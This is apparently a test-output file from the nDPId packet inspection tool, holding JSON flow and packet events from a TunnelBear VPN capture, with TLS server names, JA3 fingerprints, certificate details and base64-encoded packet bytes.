+01191{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524312,"flow_last_seen":1655734524417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5473,"flow_tot_l4_payload_len":5990,"flow_avg_l4_payload_len":998,"midstream":0,"thread_ts_msec":1655734524417,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50178,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.tunnelbear.com","server_names":"*.tunnelbear.com,tunnelbear.com","ja3":"a1c672bda2bda1a05bdca801144b2760","ja3s":"a885fb01204bc11cc58efc02fe640899","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tunnelbear.com","alpn":"h2,http\/1.1","fingerprint":"52:96:E2:83:CC:15:4E:B3:0F:5B:1D:E2:E8:FF:4E:A9:C4:E9:C0:AF"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524340,"flow_last_seen":1655734524479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3657,"flow_tot_l4_payload_len":4174,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1655734524479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","server_names":"*.polargrizzly.com,polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA","subjectDN":"CN=*.polargrizzly.com","alpn":"h2,http\/1.1","fingerprint":"1D:D9:82:8B:E8:9A:66:86:18:67:66:52:EE:02:6C:7D:09:12:B4:17"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":36,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524343,"flow_last_seen":1655734524479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3655,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1655734524479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45108,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","server_names":"*.polargrizzly.com,polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA","subjectDN":"CN=*.polargrizzly.com","alpn":"h2,http\/1.1","fingerprint":"1D:D9:82:8B:E8:9A:66:86:18:67:66:52:EE:02:6C:7D:09:12:B4:17"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524346,"flow_last_seen":1655734524479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3658,"flow_tot_l4_payload_len":4175,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1655734524479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","server_names":"*.polargrizzly.com,polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA","subjectDN":"CN=*.polargrizzly.com","alpn":"h2,http\/1.1","fingerprint":"1D:D9:82:8B:E8:9A:66:86:18:67:66:52:EE:02:6C:7D:09:12:B4:17"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524480,"flow_last_seen":1655734524480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524480,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":47496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1655734524480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524480,"pkt":"ABoRAAACABoRAAABCABFAAA83gpAAEAGu\/QKCAABovfzvLmIAbsjcXmhAAAAAKAC\/\/+l3QAAAgQFtAQCCAoBY6erAAAAAAEDAwg="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1655734524482,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524482,"pkt":"ABoRAAACABoRAAABCABFAAAoAGxAABAGyaei9\/O8CggAAQG7uYjcjoZeI3F5olAS\/\/9T0QAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1655734524482,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524482,"pkt":"ABoRAAACABoRAAABCABFAAAo3gtAAEAGvAcKCAABovfzvLmIAbsjcXmi3I6GX1AQ\/\/9T0gAA"} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524480,"flow_last_seen":1655734524484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524484,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":47496,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile-collector.newrelic.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01183{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524480,"flow_last_seen":1655734524597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3864,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1655734524597,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":47496,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile-collector.newrelic.com","server_names":"*.newrelic.com,newrelic.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"a885fb01204bc11cc58efc02fe640899","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=New Relic, Inc., CN=*.newrelic.com","alpn":"http\/1.1","fingerprint":"90:B0:56:FB:4D:88:5C:EB:F9:79:45:35:26:15:0C:00:F4:08:72:77"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734525210,"flow_last_seen":1655734525210,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734525210,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1655734525210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734525210,"pkt":"ABoRAAACABoRAAABCABFAAA8oPNAAEAGtIYKCAABaBFzKLBEAbsaEwikAAAAAKAC\/\/\/kSwAAAgQFtAQCCAoBY6hXAAAAAAEDAwg="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1655734525218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734525218,"pkt":"ABoRAAACABoRAAABCABFAAAoAJJAABAGhPxoEXMoCggAAQG7sETl7PdbGhMIpVAS\/\/8YkAAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734525218,"flow_last_seen":1655734525218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734525218,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1655734525218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734525218,"pkt":"ABoRAAACABoRAAABCABFAAA8IBpAAEAGNWAKCAABaBFzKLBGAbuqCIhCAAAAAKAC\/\/\/UtAAAAgQFtAQCCAoBY6hYAAAAAAEDAwg="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1655734525221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734525221,"pkt":"ABoRAAACABoRAAABCABFAAAoAJNAABAGhPtoEXMoCggAAQG7sEZV93e9qgiIQ1AS\/\/8YjgAA"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1655734525221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734525221,"pkt":"ABoRAAACABoRAAABCABFAAAooPRAAEAGtJkKCAABaBFzKLBEAbsaEwil5ez3XFAQ\/\/8YkQAA"} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734525210,"flow_last_seen":1655734525221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734525221,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1655734525222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734525222,"pkt":"ABoRAAACABoRAAABCABFAAAoIBtAAEAGNXMKCAABaBFzKLBGAbuqCIhDVfd3vlAQ\/\/8YjwAA"} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734525218,"flow_last_seen":1655734525224,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734525224,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":145,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734525218,"flow_last_seen":1655734525281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734525281,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734525210,"flow_last_seen":1655734525332,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734525332,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734754614,"flow_last_seen":1655734754614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1655734754614,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"104.17.114.40","src_port":38398,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1655734754614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734754614,"pkt":"ABoRAAACABoRAAABCABFAAAoVtFAAEAGeswKnoRbaBFyKJX+AbuhM960Ee9+klAQAVedJwAA"} +01154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1655734754615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1655734754615,"pkt":"ABoRAAACABoRAAABCABFAAItVtJAAEAGeMYKnoRbaBFyKJX+AbuhM960Ee9+klAYAVc2sQAAFgMBAgABAAH8AwOffU2PEFvusphnSRt4iypv4+ZmiFJN5MhWLpPRgxBGWyBzS35friOfAWwzRvK4nOaCBJAbSD\/HvnzVJtlqjl91KAAYwCvALMypwC\/AMMyowBPAFACcAJ0ALwA1AQABm\/8BAAEAAAAAGQAXAAAUYXBpLnBvbGFyZ3JpenpseS5jb20AFwAAACMAwMEVNlaL0tdGnm3V54JqurXqfhCsyPABZtbMnzb26AxMffuozfeg4IKaCIbNJ3q2zznlQTcn2vtZGw2LgspfFkx\/\/ulZltuMfvovkdu6OxfbcYa5VnIF3xidmaUJ8SUPb79tJJFaBhFXEN61mvGK7zPpvVrV3mTyXEwUGGWTkZAGHvhktDm3FDiaeMeQoyzU\/JxID7YfTFAEkYxMS3+IaSjPuX3oi2kUbrLhwugcx7H6N+6QUOak1x1EA8eU6f8ZVAANABQAEgQDCAQEAQUDCAUFAQgGBgECAQAFAAUBAAAAAAAQAA4ADAJoMghodHRwLzEuMQALAAIBAAAKAAgABgAdABcAGAAVAGgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1655734754614,"flow_last_seen":1655734754615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1655734754615,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"104.17.114.40","src_port":38398,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734754648,"flow_last_seen":1655734754648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1655734754648,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"8.8.8.8","src_port":51120,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1655734754648,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655734754648,"pkt":"ABoRAAACABoRAAABCABFAAA0IExAAEAGe28KnoRbCAgICMewADWRpqgvfDsVvoAQAVcLYgAAAQEICgFkiHG27faC"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1655734754650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655734754650,"pkt":"ABoRAAACABoRAAABCABFAAA0IE1AAEAGe24KnoRbCAgICMewADWRpqgvfDsVvoARAVcLYAAAAQEICgFkiHK27faC"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1655734754651,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734754651,"pkt":"ABoRAAACABoRAAABCABFAAAoAElAABAGy34ICAgICp6EWwA1x7B8OxW+kaaoMFAQ\/\/99FQAA"} +01154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1655734754841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1655734754841,"pkt":"ABoRAAACABoRAAABCABFAAItVtNAAEAGeMUKnoRbaBFyKJX+AbuhM960Ee9+klAYAVc2sQAAFgMBAgABAAH8AwOffU2PEFvusphnSRt4iypv4+ZmiFJN5MhWLpPRgxBGWyBzS35friOfAWwzRvK4nOaCBJAbSD\/HvnzVJtlqjl91KAAYwCvALMypwC\/AMMyowBPAFACcAJ0ALwA1AQABm\/8BAAEAAAAAGQAXAAAUYXBpLnBvbGFyZ3JpenpseS5jb20AFwAAACMAwMEVNlaL0tdGnm3V54JqurXqfhCsyPABZtbMnzb26AxMffuozfeg4IKaCIbNJ3q2zznlQTcn2vtZGw2LgspfFkx\/\/ulZltuMfvovkdu6OxfbcYa5VnIF3xidmaUJ8SUPb79tJJFaBhFXEN61mvGK7zPpvVrV3mTyXEwUGGWTkZAGHvhktDm3FDiaeMeQoyzU\/JxID7YfTFAEkYxMS3+IaSjPuX3oi2kUbrLhwugcx7H6N+6QUOak1x1EA8eU6f8ZVAANABQAEgQDCAQEAQUDCAUFAQgGBgECAQAFAAUBAAAAAAAQAA4ADAJoMghodHRwLzEuMQALAAIBAAAKAAgABgAdABcAGAAVAGgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734755247,"flow_last_seen":1655734755247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734755247,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.7.32","src_port":60224,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1655734755247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734755247,"pkt":"ABoRAAACABoRAAABCABFAAA8IytAAEAGaHgKCAABnfAHIOtAAbueF6osAAAAAKAC\/\/\/ZOgAAAgQFtAQCCAoBZIkHAAAAAAEDAwg="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1655734755253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734755253,"pkt":"ABoRAAACABoRAAABCABFAAAoAEtAABAGu2yd8AcgCggAAQG760Bh6FXTnheqLVAS\/\/8TvQAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1655734755253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734755253,"pkt":"ABoRAAACABoRAAABCABFAAAoIyxAAEAGaIsKCAABnfAHIOtAAbueF6otYehV1FAQ\/\/8TvgAA"} 